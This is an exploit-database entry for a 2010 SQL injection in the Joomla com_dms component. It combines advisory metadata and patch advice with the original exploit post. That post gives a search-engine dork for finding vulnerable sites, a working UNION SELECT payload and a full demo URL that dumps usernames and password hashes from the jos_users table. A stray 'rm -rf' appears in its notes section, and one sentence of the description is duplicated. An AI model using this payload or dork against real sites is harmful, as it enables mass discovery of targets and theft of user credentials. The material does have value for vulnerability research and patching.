Joomla Component com_dms Remote SQL injection vulnerability - (category_id)

vendor:

Joomla Component com_dms

by:

kaMtiEz

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: Joomla Component com_dms

Affected Version From: 2.5.1

Affected Version To: 2.5.1

Patch Exists: YES

Related CWE: N/A

CPE: a:joomdonation:joomla_component_com_dms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2010

Joomla Component com_dms Remote SQL injection vulnerability – (category_id)

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'category_id' in the URL. This can be done by appending a malicious SQL query to the vulnerable parameter in the URL. This can be done by appending a malicious SQL query to the vulnerable parameter in the URL. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.

Source

Exploit-DB raw data:

/**************************************************************************

[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 28 January, 2010


**************************************************************************/

[ Software Information ]

[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================

[ Vulnerable File ]

http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

[ Demo ]

http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] Bercinta Sekuat Tenaga !
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..